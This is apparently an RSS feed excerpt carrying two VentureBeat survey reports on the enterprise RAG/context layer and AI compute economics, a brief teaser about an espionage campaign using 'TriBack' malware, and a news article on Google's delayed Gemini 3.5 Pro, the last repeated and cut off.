<content:encoded><![CDATA[<p>Across 101 enterprises, the infrastructure that feeds AI agents their business context is being built faster than it can be trusted. Retrieval-augmented generation is already the default context source, and provider-native retrieval has quietly overtaken the dedicated vector databases that define the category — yet a majority of enterprises have already watched their agents produce confident, wrong answers traced to missing or inconsistent context. A governed semantic layer is emerging as the fix, but most are still building it; the field is converging on hybrid retrieval; and even as provider-native tools lead in practice, a plurality say they intend to keep best-of-breed. The result is a context gap — agents that sound authoritative running on a foundation their owners do not yet fully trust.</p><p>This wave of VentureBeat Pulse Research examines the enterprise RAG and context layer: what feeds AI agents their business context, which retrieval systems enterprises run, how they buy and measure them, where the architecture is heading, and — most revealingly — how often that context is already failing them.</p><p>The central finding is a context gap — the distance between how confidently enterprise agents answer and how reliable the context beneath them actually is. A majority of enterprises (57%) report that in the past six months their AI agents produced confident but wrong answers they traced to missing or inconsistent business context, and more than half of those said it happened more than once. This is not a fringe failure: retrieval is the primary context source for 38% of enterprises, more than any other approach, so when retrieval is thin or inconsistent, the errors it produces are wearing the agent’s authority. The infrastructure to fix it is being built — 58% already run or are building a governed semantic layer — but for most it is not yet in production.</p><p>Underneath, the market is consolidating in a direction that surprises. Provider-native retrieval — OpenAI’s file search (40%) and Google’s Vertex AI Search (38%) — already leads every dedicated vector database, and enterprises expect hybrid retrieval to dominate by the end of 2026 (34%). Yet a plurality (36%) say they intend to keep best-of-breed standalone tools rather than consolidate onto a provider’s native context stack, and a majority (57%) plan to switch or add a provider within the year. Stated preference and actual usage are pulling in opposite directions — the market is buying provider-native while insisting it wants independence.</p><h2>Methodology</h2><p>VentureBeat fielded this survey as part of its ongoing Pulse Research series. This survey focused on enterprise RAG infrastructure and the context layer — the retrieval systems, semantic layers, and context sources that feed AI agents. Responses are filtered to organizations with more than 100 employees (n=101); the survey drew no responses from organizations of 100 or fewer, so the full sample qualifies. All responses are from a single Q2 2026 (June) wave, so the report reads cross-sectionally and does not infer month-over-month trends. Several questions were multiple-select, so those shares can sum to more than 100%.</p><p>By organization size the sample concentrates in the mid-market: 251–1,000 employees (31%) and 101–250 (31%) lead, with 1,001–5,000 (20%), 5,001–10,000 (12%), and 10,001+ (7%) above them. By role it spans managers (39%), individual contributors (27%), the C-suite (16%), and VPs and directors (14%); on purchasing authority it is buyer-credible, with 46% final decision-makers and another 26% recommenders or influencers. Technology/Software is the largest industry at 20%, followed by Healthcare/Life Sciences (11%) and a broad spread across retail, transportation, financial services, manufacturing, and education.</p><p>At 101 respondents this is a modest sample and should be read as a directional signal rather than a precise measurement; it is self-selected and is not a probability sample. It is best read as the view from organizations actively standing up RAG and context infrastructure rather than from the largest operators.</p><h2>Finding 1: Confident and wrong</h2><p><b>More than half have traced agent errors to bad context</b></p><p>We asked whether, in the past six months, enterprises had traced a confident but wrong agent answer to missing or inconsistent business context. Most had.</p><div></div><p>This is the report’s defining number. A majority of enterprises (57%) have already had an AI agent produce a confident, wrong answer they traced to bad context — wrong metrics, stale definitions, or missing documents — and more than half of those have seen it happen more than once. Only 28% report no such failure, and a small remainder either don’t run agents on enterprise data or don’t trace root cause closely enough to know. </p><p>The failure mode is specific and dangerous: the model is not obviously hallucinating; it is confidently wrong because the context feeding it was thin or inconsistent. Everything else in this report — what enterprises retrieve, how they govern it, and what they plan to build — is downstream of this problem.</p><h2>Finding 2: RAG is the default context source</h2><p><b>Retrieval feeds more agents than any other method</b></p><p>We asked what an enterprise’s AI agents primarily use to understand its data. Retrieval leads by a wide margin.</p><div></div><p>Retrieval is the backbone of enterprise context. For 38% of organizations, RAG over documents or a vector index is the primary way agents understand the business — nearly twice the share of the next approach, a governed semantic layer or ontology (21%). Mixed approaches (14%), direct live-system queries (10%), and long-context loading (6%) fill out the rest, and only 2% let agents run on the model’s general knowledge alone. The concentration matters in light of Finding 1: because so much enterprise context flows through retrieval, the quality of that retrieval is the quality of the answer. When RAG is the default source, thin retrieval is not an edge case — it is the main failure surface.</p><p>One approach is notable for its absence from these answers: customizing model weights, also known as fine-tuning. Every leading source of business context is injected at run time. Our most recent direct measurement of fine-tuning comes from our April–May survey wave (a separate survey, n=136), where fine-tuning capabilities ranked last of six factors in model selection at 5% — even as 26% of that sample still named fine-tuning and customization an investment they expect to grow. Fine-tuning has fallen out of the primary selection conversation; context injection is how enterprises make agents knowledgeable about their business.</p><h2>Finding 3: Provider-native retrieval already leads the vector databases</h2><p><b>OpenAI file search and vertex AI search top the dedicated tools</b></p><p>We asked which retrieval systems enterprises run in production today. The answer favors the model providers and hyperscalers over the specialists.</p><div></div><p>The dedicated vector database is no longer the center of the RAG stack. OpenAI’s file search (40%) and Google’s Vertex AI Search (38%) lead — provider-native and hyperscaler-native retrieval — ahead of every purpose-built vector database. Among the specialists, the most-used is the one enterprises already run for other reasons (Elasticsearch/OpenSearch, 20%) and the open, embedded option (pgvector, 12%); the pure-play vector databases that define the category — Weaviate, Qdrant, Pinecone, Milvus — each sit in single digits to low double digits. Notably, 13% of enterprises say they still run no production RAG at all. As with the platforms in the parallel infrastructure wave, enterprises are gravitating to retrieval that comes bundled with tools they already buy.</p><p>The shape of this finding held across both Q2 waves. In April–May (n=161), provider-built retrieval led usage there too, while every dedicated vector database remained marginal — the most-used standalone vector database peaked at 8% of that sample — and the hybrid, pluralistic future was already the consensus expectation (34% expected hybrid retrieval to dominate, with another 29% expecting multiple architectures by use case). Two waves, consistent picture: the category that coined the “vector database” term is being collected by the platforms enterprises already buy from.</p><h2>Finding 4: But they say they want to keep best-of-breed</h2><p><b>A plurality resist consolidating onto a provider’s native stack</b></p><p>We asked how enterprises will respond as model providers bundle retrieval, memory, and orchestration into their platforms. Their stated intent cuts against their current usage.</p><div></div><p>Here is the tension at the heart of the stack. Even as provider-native retrieval leads in practice (Finding 3), a plurality of enterprises (36%) say they intend to keep best-of-breed standalone tools rather than consolidate onto a provider’s native context stack — well ahead of the 21% who plan to consolidate. Another 21% expect a mix, and 9% intend to build and own the layer themselves. The gap between what enterprises run and what they say they want is the strategic question of the category: they are adopting bundled retrieval for convenience while asserting they will preserve independence. Which impulse wins — the pull of the provider bundle or the stated preference for modular control — will shape the retrieval market more than any single tool.</p><h2>Finding 5: Hybrid retrieval is the consensus bet</h2><p><b>Vector-only retrieval is already seen as insufficient</b></p><p>We asked which retrieval architecture enterprises expect to dominate their production RAG systems by the end of 2026. The field is converging — with a large share still unsure.</p><div></div><p>The architecture is settling on hybrid. A third (34%) expect hybrid retrieval — embeddings combined with reranking and access controls — to dominate their production systems by the end of 2026, three times the 11% who expect vector-only retrieval to prevail. That is a notable signal: the pure vector-search approach that launched the category is already viewed as insufficient on its own, superseded by pipelines that add reranking for accuracy and access controls for governance — the very access controls whose absence produces the failures in Finding 1. Tellingly, the second-largest answer is uncertainty: 17% simply don’t know, and another 14% expect to move beyond a dedicated vector layer entirely toward tool-first or long-context retrieval. The consensus is not a single tool but a layered pipeline — and it is not yet fully formed.</p><h2>Finding 6: The governed context layer is being built now</h2><p><b>Most run or are building a semantic layer — few in production</b></p><p>We asked whether enterprises use a governed semantic or context layer to give agents and BI a shared understanding of their data. Most are on the path; fewer have arrived.</p><div></div><p>The fix for the context gap is under construction. Well over half of enterprises (58%) either run a governed semantic layer in production (25%) or are piloting and building one (34%), and a further 17% are actively evaluating — meaning three-quarters are engaged with the idea in some form. But the balance is telling: more are building than have shipped, so for most enterprises the shared, governed definition layer that would prevent the "confident but wrong" failures of Finding 1 is still a work in progress. The semantic layer is the industry’s answer to inconsistent context; this wave catches it mid-construction, ambition well ahead of production.</p><h2>Finding 7: Bought on ingestion and simplicity, watched for correctness</h2><p><b>Selection favors operability; monitoring favors correctness and security</b></p><p>We asked what matters most when enterprises choose a retrieval system, and what they track once it is running. Both answers lean practical.</p><div></div><p>Enterprises choose retrieval systems on operability. Ease of data ingestion (36%), latency and performance (32%), and operational simplicity (29%) lead the selection criteria — ahead of retrieval accuracy and access control (23% each), the two factors most directly tied to the failures in Finding 1. Once systems are running, the emphasis shifts toward trust: the most-tracked metrics are response correctness (42%) and security and access control (38%), ahead of latency (28%), operational stability (27%), and answer relevance (23%). </p><p>Satisfaction with current systems is moderately positive but not enthusiastic — on a five-point scale, overall satisfaction averages 4.0, with ease of implementation and value for money both near 3.9. Enterprises buy for how easily a system runs and watch it for whether it can be trusted.</p><h2>Finding 8: A retrieval reshuffle is coming</h2><p><b>A majority plan to change providers — and the vector specialists are gaining interest</b></p><p>We asked whether enterprises plan to change or add a retrieval provider, and which they are considering. The consideration set differs from today’s stack.</p><div></div><p>The retrieval stack is not settled. While 43% have no plans to change, a small majority (57%) intend to switch or add a provider within twelve months, and a quarter (26%) within the next quarter. The consideration set is where it gets interesting: provider-native retrieval still leads what enterprises are evaluating (OpenAI 22%, Vertex AI Search 21%), but the open-source vector specialists punch above their current footprint — Qdrant (14%) and Milvus (13%) draw more switching interest than their present usage (10% and 6%) would suggest. Read with Finding 4, the picture is a market in flux: enterprises run provider-native today, are evaluating a broader field, and say they want to keep their options open. The reshuffle ahead will test whether best-of-breed intent survives contact with the convenience of the bundle.</p><h1>The bottom line: A context gap that more retrieval alone won’t close</h1><p>Organizations with more than 100 employees are wiring agents into their business faster than they can guarantee the context those agents run on. Retrieval is the default source of enterprise context, and it increasingly comes from the model providers and hyperscalers rather than the dedicated vector databases — yet a majority of enterprises have already watched agents answer confidently and wrongly because that context was thin or inconsistent. The failure is not exotic; it is the predictable result of pointing authoritative-sounding agents at an unreliable foundation.</p><p>The industry’s answer — a governed semantic layer, hybrid retrieval with reranking and access controls — is being built but is mostly not yet in production, and enterprises are pulled between the convenience of provider-native bundles and a stated preference for best-of-breed independence. At 101 respondents in a single Q2 wave this is a directional read, skewed toward the mid-market — but the direction is clear: the context layer is the next contested tier of the AI stack, and right now agents are running ahead of it. The context gap is not a retrieval-volume problem that more documents or bigger indexes will solve on their own; it is a problem of governed, consistent, access-aware context. The open question for later waves is whether enterprises finish building that layer before the confident-but-wrong failures move from the lab into decisions that matter.</p><hr><p><i>Based on survey responses from 101 qualified enterprise respondents (100+ employees), drawn from a single Q2 2026 (June) wave. At this sample size the results should be read as a directional signal rather than a precise measurement — it's a self-selected sample, not a probability sample, and skews toward the mid-market. Respondents include managers, individual contributors, VPs/directors, and the C-suite, with strong purchasing authority, across technology, healthcare, retail, transportation, financial services, manufacturing, and education.</i></p>]]></content:encoded>
</item>
<item>
<title><![CDATA[The AI compute gap: Enterprises are buying infrastructure faster than they can measure what it costs]]></title>
<description><![CDATA[Across 107 enterprises, AI infrastructure spending is accelerating well ahead of the ability to see or steer its economics. Most organizations run their AI on a familiar base of hyperscalers and model-provider APIs, yet the next dollar is aimed at specialized compute almost none of them use today...]]></description>
<link>https://tsecurity.de/de/3689826/it-nachrichten/the-ai-compute-gap-enterprises-are-buying-infrastructure-faster-than-they-can-measure-what-it-costs/</link>
<guid isPermaLink="true">https://tsecurity.de/de/3689826/it-nachrichten/the-ai-compute-gap-enterprises-are-buying-infrastructure-faster-than-they-can-measure-what-it-costs/</guid>
<pubDate>Thu, 23 Jul 2026 19:19:39 +0200</pubDate>
<category>📰 IT Nachrichten</category>
<source url="https://tsecurity.de">tsecurity.de</source>
<content:encoded><![CDATA[<p>Across 107 enterprises, AI infrastructure spending is accelerating well ahead of the ability to see or steer its economics. Most organizations run their AI on a familiar base of hyperscalers and model-provider APIs, yet the next dollar is aimed at specialized compute almost none of them use today; a majority intend to switch or add providers within the year, many within a quarter. Buying decisions turn on integration and total cost of ownership rather than headline token price — which is fortunate, because most enterprises cannot yet see their unit economics clearly: GPUs sit at half utilization or less, and fewer than half rigorously track what their compute actually costs. The result is a compute gap — heavy, fast-moving investment running ahead of the visibility needed to control it.</p><p>This wave of VentureBeat Pulse Research examines enterprise AI infrastructure and compute: where organizations are in their deployment journey, what they run AI on today, how satisfied they are, what would make them switch, where they plan to evaluate their investments, and — most revealingly — how well they can measure and control the economics of the compute underneath it all.</p><p>The central finding is a compute gap — the distance between how aggressively enterprises are investing in AI infrastructure and how little of its economics they can see. Only about one in five (21%) run AI in production at scale, yet spending intentions are outrunning that maturity: the single largest planned area enterprises plan to evaluate over the next year is AI-specialized clouds (45%), a layer almost none of these enterprises use today. Meanwhile the compute already in place runs cold — 83% report GPU utilization of 50% or less — and fewer than half (44%) can rigorously track what their AI compute costs. Enterprises are buying more infrastructure faster than they can account for what they already own.</p><p>Enterprises are not settled on their infrastructure vendors, either: A clear majority (64%) plan to switch or add an infrastructure provider within twelve months, and 38% within the next quarter — unusually high churn intent for a category this foundational. When they choose, they choose on integration with the existing stack (41%) and total cost of ownership (35%), not on headline price: cost per million tokens is the deciding factor for just 8%. And the frontier constraint that will shape the next round of decisions — the shift from GPU compute to memory bandwidth as inference scales — is barely on the radar, with roughly one in five enterprises either unaware of it or yet to address it.</p><h2>Methodology</h2><p>VentureBeat fielded this survey as part of its ongoing Pulse Research series, this survey focused on enterprise AI infrastructure, compute, and inference economics. Responses are filtered to organizations with more than 100 employees (n=107; the survey’s smallest size band, 1–100 employees, is excluded), drawn from a single Q2 2026 (June) wave. Because this is one wave rather than a pooled multi-month sample, the report reads cross-sectionally and does not infer month-over-month trends. Several questions were multiple-select, so those shares can sum to more than 100%.</p><p>By organization size the sample concentrates in the mid-market: 101–250 employees (36%) and 251–1,000 (27%) lead, with 1,001–5,000 (22%), 5,001–10,000 (8%), and 10,001+ (7%) above them. By role it spans managers (38%), individual contributors (28%), VPs and directors (19%), and the C-suite (13%); on purchasing authority it is buyer-credible, with 45% final decision-makers and another 30% recommenders or influencers for AI solutions. Technology/Software is the largest industry at 26%, followed by Healthcare/Life Sciences (15%), Financial Services (13%), and Retail/E-commerce (12%).</p><p>At 107 respondents the sample is large enough to read directionally but should be treated as a directional signal rather than a precise measurement; it is self-selected and is not a probability sample. It also skews toward the mid-market and toward earlier-stage adopters, so it is best read as the view from organizations actively building out AI infrastructure rather than from the largest hyperscale operators.</p><h2>Finding 1: Ambition outpaces production</h2><p><b>Only one in five run AI in production at scale</b></p><p>We asked where organizations sit in their AI deployment journey. Most are still building toward production rather than operating at scale.</p><div></div><p>The maturity curve is front-loaded. Three-quarters of enterprises (76%) are either experimenting or running only some workloads in production, and just 21% describe AI in production at scale. This matters for everything that follows: the infrastructure decisions in this report are being made largely by organizations still early in deployment, whose compute footprint — and whose costs — are about to grow. The evaluation and switching intentions in Findings 3 and 4 are the leading edge of that build-out, not the settled preferences of operators who have already found what works.</p><h2>Finding 2: Enterprises run on hyperscalers and model APIs</h2><p><b>The specialized GPU clouds barely register — today</b></p><p>We asked which providers and platforms enterprises currently use to run their AI. The answer is a familiar one: the incumbents.</p><div></div><p>The current stack is hyperscaler-and-API. Google Cloud leads at 48%, and the general-purpose clouds (Google, Microsoft, AWS, Oracle) together with the major model APIs (Gemini, OpenAI, Anthropic) account for essentially all current deployment. The specialized “neocloud” GPU providers that dominate AI-infrastructure headlines — CoreWeave, Lambda, Crusoe, Nebius and peers — register at or near zero among these enterprises today. Only 6% run their own on-prem GPU clusters and 4% a custom open-source stack. Enterprises are, for now, running AI on the providers they already buy from — which makes the evaluation intentions in Finding 3 all the more striking.</p><p><i>(A note on reading these shares. As described in the methodology section, this sample is self-selected and skews mid-market, and this question counted every provider a respondent uses — an average of 2.1 selections each — so the figures measure presence in the stack rather than spending or primary status. A sample built this way will show a different provider mix than a spend-weighted census of the broader market; Google's strength here, for example, is consistent with its long-standing position among smaller enterprises building on AI. Read these shares as a portrait of what this AI-active cohort runs today, and treat gaps between these figures and industry-wide market share estimates as a property of the sample rather than a contradiction of either.)</i></p><h2>Finding 3: The next dollar goes to infrastructure they don’t yet run</h2><p><b>AI-specialized clouds top the evaluations list</b></p><p>We asked where enterprises planned to evaluate AI infrastructure over the next 12 months. Their answers point away from the stack they run today.</p><div></div><p>Here is the report’s sharpest tension. The single most-cited planned evaluation area — AI-specialized clouds, at 45% — is the very category almost none of these enterprises use today (Finding 2). Nearly a third (32%) intend to evaluate non-Nvidia accelerators, and 28% in next-generation Nvidia silicon; even decentralized compute networks (16%) and sovereign compute (11%) draw meaningful interest. Read against current usage, this is not incremental — it is the leading edge of a re-platforming. The direction-of-travel question tells the same story: every infrastructure approach is net-expanding, but specialized AI clouds carry the highest net momentum (+24), edging out even the hyperscalers (+22). Enterprises are preparing to move a meaningful share of AI compute off the general-purpose cloud.</p><p>This continues a trend we saw in our April-May survey wave. Back then, usage of the AI-specialized clouds was equally marginal — CoreWeave at 3%, Lambda at 4%, Crusoe at 2% of enterprises. When we asked enterprises what change they planned in their AI infrastructure strategy over the next twelve months, the most-cited answer was moving workloads to specialized AI clouds, at 33%. Asked in April-May which emerging compute option they were most likely to evaluate AI-specialized clouds again drew the most responses. Two waves, two differently worded questions, one consistent picture: the type of cloud enterprises are most eager to assess is the type they have barely begun to use.</p><h2>Finding 4: A switching wave is building</h2><p><b>Six in 10 plan to change providers within a year — many within a quarter</b></p><p>We asked whether and when enterprises plan to switch or add an infrastructure provider. Very few intend to stand still.</p><div></div><p>For a category as foundational as compute, this is a remarkable amount of intended movement. Only 36% have no plans to change, meaning a clear majority (64%) intend to switch or add a provider within twelve months — and 38% within the next quarter alone. Where that interest points is telling: the providers drawing the most switching consideration are again the incumbents — Microsoft Azure and Google Cloud (33% each), OpenAI (30%), and Gemini (22%) — which suggests much of the near-term movement is reshuffling among the majors and consolidating spend rather than defecting to new entrants. The neocloud interest in Finding 3 is a 12-month evaluation thesis; the switching in the next quarter is mostly incumbents trading share.</p><p>(<i>Method note: Respondents who selected both "no plans to change" and a specific switching window are counted as switchers, on the logic that naming a timeframe is the more specific answer; three respondents were reclassified under this rule.</i>)</p><h2>Finding 5: Nobody buys on token price</h2><p><b>Integration and total cost of ownership decide — not sticker price</b></p><p>We asked what matters most when enterprises select an AI infrastructure provider. Headline price finished last.</p><div></div><p>Enterprises do not buy AI infrastructure on pricing, which is the place vendors compete on hardest. Integration with the existing stack (41%) and total cost of ownership (35%) dominate, while the headline metric — cost per million tokens — is the deciding factor for just 8%, dead last. The pattern is coherent: buyers are optimizing for how a provider fits and what it truly costs to operate, not for the advertised unit rate. It also foreshadows Finding 7 — enterprises say TCO matters most, yet most cannot yet measure it rigorously. The stated priority and the measured capability are out of step.</p><h2>Finding 6: Expensive GPUs, idle most of the time</h2><p><b>83% report GPU utilization of 50% or less</b></p><p>We asked what share of their GPU capacity enterprises actually utilize. The answer is a well-known but rarely quantified inefficiency.</p><div></div><p><i>Disclosure: Band percentages count every selection against all 107 qualified respondents; 14 respondents selected more than one band, so bands overlap. At the respondent level, 83 of the 100 GPU-operating enterprises reported utilization at or below 50%</i></p><p>The compute already in place runs cold. Adding the bands at or below half capacity, 83% of enterprises that operate GPUs report utilization of 50% or less, and nearly half (49%) run at 25% or below. Only 12% clear the 50% mark, and a further 8% do not measure utilization at all. Idle accelerators are expensive accelerators, and this is the clearest single measure of the compute gap: enterprises are planning to buy more GPUs and specialized compute (Finding 3) while the capacity they already own sits substantially unused. The efficiency headroom in the current fleet is large — and largely unmeasured.</p><h2>Finding 7: Spending fast, measuring slowly</h2><p><b>Fewer than half rigorously track what their compute costs</b></p><p>We asked whether enterprises can quantify the cost and return of their AI infrastructure spend, and how satisfied they are with what they run. Confidence in the ledger lags the spending.</p><div></div><p>Measurement trails money. Fewer than half of enterprises (44%) rigorously track the cost and return of their AI compute; the majority track only partially (39%), cannot quantify it yet (20%), or have not prioritized it (6%). That gap is consequential given Finding 5, where total cost of ownership was the second-ranked buying criterion — enterprises are choosing providers on an economic basis they mostly cannot yet measure. Satisfaction with current infrastructure is moderately positive but not enthusiastic: on a five-point scale, overall satisfaction averages 4.0, with ease of implementation (3.8) and value for money (3.9) trailing slightly — the softness landing, tellingly, on cost. Enterprises are spending quickly and accounting slowly.</p><h2>Finding 8: The next bottleneck few are watching</h2><p><b>As inference shifts from compute to memory, the field scatters</b></p><p>Finally, we asked how enterprises would address the emerging constraint in large-scale inference — the shift from GPU compute to memory, specifically KV-cache capacity. The responses reveal a frontier that is not yet a priority.</p><div></div><p>The memory frontier is real but barely governed. Asked which approach they would rely on as the binding constraint in inference shifts from compute to memory bandwidth, enterprises scatter: Dell leads at 31%, Nvidia follows at 16%, and the rest fragments across storage vendors, open-source tooling, and model-level efficiency techniques. Most telling is that roughly one in five (18%) either do not recognize the constraint or have not begun to address it. For a shift that will reshape inference cost and architecture, this is an early and unsettled market — and, consistent with the measurement gap in Finding 7, one where many enterprises simply do not yet have a view. It is the next chapter of the compute gap, arriving before most have closed the current one.</p><h2>The bottom line: A compute gap that faster spending will widen, not close</h2><p>Organizations with more than 100 employees are investing in AI infrastructure faster than they can measure it. Most are still early in deployment, yet their spending intentions point past their current stack — toward specialized clouds and alternative accelerators almost none of them run today — and a clear majority intend to change providers within the year. They buy on integration and total cost of ownership rather than headline price, which is rational; the difficulty is that most cannot yet see those economics clearly.</p><p>The visibility gap is concrete. The GPUs enterprises already own run at half utilization or less for the overwhelming majority, and fewer than half can rigorously track what their compute costs or returns. Satisfaction is decent but unenthusiastic, softest on value for money — the dimension hardest to judge without measurement. And the next constraint, the shift from compute to memory in large-scale inference, is arriving while most enterprises are still unaware of it. At 107 respondents in a single Q2 wave this is a directional read, skewed toward the mid-market and earlier-stage adopters — but the direction is consistent: the appetite to spend is running well ahead of the instrumentation to spend well. The compute gap is not a capacity problem that more hardware will solve on its own; it is, first, a problem of seeing what the hardware already costs. The open question for later waves is whether enterprises build that visibility before the re-platforming arrives — or buy the next layer of infrastructure as blind to its economics as the last.</p><hr><p><i>Based on survey responses from 107 qualified enterprise respondents (100+ employees), drawn from a single Q2 2026 (June) wave. Because this is one wave rather than a pooled multi-month sample, the results read cross-sectionally rather than as a month-over-month trend, and at 107 respondents this is a directional signal rather than a precise measurement — the sample is self-selected, skews mid-market, and leans toward earlier-stage adopters rather than the largest hyperscale operators. Respondents include managers, individual contributors, VPs/directors, and the C-suite, with buyer-credible purchasing authority, across Technology/Software, Healthcare/Life Sciences, Financial Services, Retail/E-commerce, and other industries.</i></p>]]></content:encoded>
</item>
<item>
<title><![CDATA[Hackers’ OPSEC Mistake Exposed a Global Espionage Campaign and Its New TriBack Malware]]></title>
<description><![CDATA[A simple mistake by cyber spies has pulled back the curtain on a wide ranging espionage effort. It reached hospitals, government offices, and schools across several continents in early 2026. In mid April, operators left a staging server open with…
Read more →
The post Hackers’ OPSEC Mistake Expos...]]></description>
<link>https://tsecurity.de/de/3689716/it-security-nachrichten/hackers-opsec-mistake-exposed-a-global-espionage-campaign-and-its-new-triback-malware/</link>
<guid isPermaLink="true">https://tsecurity.de/de/3689716/it-security-nachrichten/hackers-opsec-mistake-exposed-a-global-espionage-campaign-and-its-new-triback-malware/</guid>
<pubDate>Thu, 23 Jul 2026 18:44:42 +0200</pubDate>
<category>📰 IT Security Nachrichten</category>
<source url="https://tsecurity.de">tsecurity.de</source>
<content:encoded><![CDATA[<p>A simple mistake by cyber spies has pulled back the curtain on a wide ranging espionage effort. It reached hospitals, government offices, and schools across several continents in early 2026. In mid April, operators left a staging server open with…</p>
<p class="more-link-p"><a class="more-link" href="https://www.itsecuritynews.info/hackers-opsec-mistake-exposed-a-global-espionage-campaign-and-its-new-triback-malware/">Read more →</a></p>
<p>The post <a href="https://www.itsecuritynews.info/hackers-opsec-mistake-exposed-a-global-espionage-campaign-and-its-new-triback-malware/">Hackers’ OPSEC Mistake Exposed a Global Espionage Campaign and Its New TriBack Malware</a> appeared first on <a href="https://www.itsecuritynews.info/">IT Security News</a>.</p>]]></content:encoded>
</item>
<item>
<title><![CDATA[Google CEO distracts from Gemini 3.5 Pro delay with talk of Gemini 4 and monthly releases]]></title>
<description><![CDATA[Google CEO Sundar Pichai has sought to allay concerns over the delayed release of the Gemini 3.5 Pro large language model. He dodged questions about it in Google’s quarterly earnings call on Wednesday by focusing on the company’s next frontier AI model, Gemini 4, and plans to release subsequent L...]]></description>
<link>https://tsecurity.de/de/3689702/ai-nachrichten/google-ceo-distracts-from-gemini-35-pro-delay-with-talk-of-gemini-4-and-monthly-releases/</link>
<guid isPermaLink="true">https://tsecurity.de/de/3689702/ai-nachrichten/google-ceo-distracts-from-gemini-35-pro-delay-with-talk-of-gemini-4-and-monthly-releases/</guid>
<pubDate>Thu, 23 Jul 2026 18:38:04 +0200</pubDate>
<category>🔧 AI Nachrichten</category>
<source url="https://tsecurity.de">tsecurity.de</source>
<content:encoded><![CDATA[<div>
		<div class="grid grid--cols-10@md grid--cols-8@lg article-column">
					  <div class="col-12 col-10@md col-6@lg col-start-3@lg">
						<div class="article-column__content">
<section class="wp-block-bigbite-multi-title"><div class="container"></div></section>



<p class="wp-block-paragraph">Google CEO Sundar Pichai has sought to allay concerns over the delayed release of the Gemini 3.5 Pro large language model. He dodged questions about it in Google’s quarterly earnings call on Wednesday by focusing on the company’s next frontier AI model, Gemini 4, and plans to release subsequent LLMs at an almost monthly cadence.</p>



<p class="wp-block-paragraph">His comments came a day after <a href="https://blog.google/innovation-and-ai/models-and-research/gemini-models/gemini-3-6-flash-3-5-flash-lite-3-5-flash-cyber/" target="_blank" rel="noreferrer noopener">Google unveiled Gemini 3.6 Flash</a> and 3.5 Flash Cyber but offered no update on the release of Gemini 3.5 Pro, the company’s delayed flagship reasoning model that many developers had expected to arrive weeks earlier.</p>



<p class="wp-block-paragraph">Google introduced the Gemini 3.5 family at its annual I/O conference, promising to release the Pro model in June. That timeline has since slipped, with <a href="http://bloomberg.com/news/articles/2026-07-16/google-gemini-launch-delayed-as-tech-falls-short-of-internal-goals" target="_blank" rel="noreferrer noopener">Bloomberg suggesting Gemini 3.5 Pro is months late</a> because the model’s coding performance is falling short of internal expectations, especially when compared to better performance by similar models from OpenAI and Anthropic.</p>



<p class="wp-block-paragraph">Instead of revisiting the Gemini 3.5 Pro timeline, Pichai used the earnings call to shift the discussion toward Gemini 4, when asked about how his company planned to navigate an increasingly competitive race to release frontier AI models by to Barclays Investment Bank analyst Ross Sandler.</p>



<p class="wp-block-paragraph">“We are creating a baseline on top of which you will see us rapidly iterate on subsequent model releases. And so picking up pace and releasing models almost at a monthly cadence is part of our road map as we are building Gemini 4 as well,” Pichai said during the <a href="https://www.youtube.com/watch?v=LzExSq9DU9w" target="_blank" rel="noreferrer noopener">call</a>.</p>



<p class="wp-block-paragraph">Sandler’s question followed one from JPMorgan Chase &amp; Co analyst <a href="https://www.linkedin.com/in/douglas-anmuth-9229621/" target="_blank" rel="noreferrer noopener">Douglas Anmuth</a>, who asked Pichai if Google was releasing frontier AI models frequently enough to keep pace with rivals OpenAI and Anthropic.</p>



<p class="wp-block-paragraph">Pichai had responded to Anmuth’s question that Google remained confident of competing at the frontier and was investing heavily in a larger Gemini 4 base model.</p>



<p class="wp-block-paragraph">Analysts, though, aren’t as confident as Pichai.</p>



<p class="wp-block-paragraph">While delays to Google’s frontier model roadmap have not triggered an exodus of existing customers, either because of high switching costs or because many enterprises already running multi-model architectures, they have made CIOs evaluating AI platforms more cautious about making new commitments, said <a href="https://www.linkedin.com/in/bhupendrachopra" target="_blank" rel="noreferrer noopener">Bhupendra Chopra</a>, chief revenue officer at IT consulting firm Kanerika.</p>



<p class="wp-block-paragraph">A monthly model release cadence could prove to be a double-edged sword for enterprises and their CIOs.</p>



<p class="wp-block-paragraph">While a monthly release cadence could help enterprises gain faster access to improvements in model performance, cost and capabilities, it will also require CIOs to invest more heavily in testing, governance and version management to safely adopt those updates, said <a href="https://greyhoundresearch.com/svg/" target="_blank" rel="noreferrer noopener">Sanchit Vir Gogia</a>, chief analyst at Greyhound Research.</p>



<p class="wp-block-paragraph">Similarly, <a href="https://pareekh.com/about/" target="_blank" rel="noreferrer noopener">Pareekh Jain</a>, principal analyst at Pareekh Consulting, said enterprises will embrace a faster release cadence only if each successive model delivers measurable improvements in performance, cost or safety, rather than simply changing version number.</p>



<p class="wp-block-paragraph">The challenge for CIOs, Jain said, is not just keeping up with model releases; it’s deciding whether each new version is worth the cost of validating it.</p>



<p class="wp-block-paragraph"></p>
</div></div></div></div>]]></content:encoded>
</item>
<item>
<title><![CDATA[Google CEO distracts from Gemini 3.5 Pro delay with talk of Gemini 4 and monthly releases]]></title>
<description><![CDATA[Google CEO Sundar Pichai has sought to allay concerns over the delayed release of the Gemini 3.5 Pro large language model. He dodged questions about it in Google’s quarterly earnings call on Wednesday by focusing on the company’s next frontier AI model, Gemini 4, and plans to release subsequent L...]]></description>
<link>https://tsecurity.de/de/3689687/it-nachrichten/google-ceo-distracts-from-gemini-35-pro-delay-with-talk-of-gemini-4-and-monthly-releases/</link>
<guid isPermaLink="true">https://tsecurity.de/de/3689687/it-nachrichten/google-ceo-distracts-from-gemini-35-pro-delay-with-talk-of-gemini-4-and-monthly-releases/</guid>
<pubDate>Thu, 23 Jul 2026 18:35:20 +0200</pubDate>
<category>📰 IT Nachrichten</category>
<source url="https://tsecurity.de">tsecurity.de</source>
<content:encoded><![CDATA[<div>
		<div class="grid grid--cols-10@md grid--cols-8@lg article-column">
					  <div class="col-12 col-10@md col-6@lg col-start-3@lg">
						<div class="article-column__content">
<section class="wp-block-bigbite-multi-title"><div class="container"></div></section>



<p class="wp-block-paragraph">Google CEO Sundar Pichai has sought to allay concerns over the delayed release of the Gemini 3.5 Pro large language model. He dodged questions about it in Google’s quarterly earnings call on Wednesday by focusing on the company’s next frontier AI model, Gemini 4, and plans to release subsequent LLMs at an almost monthly cadence.</p>



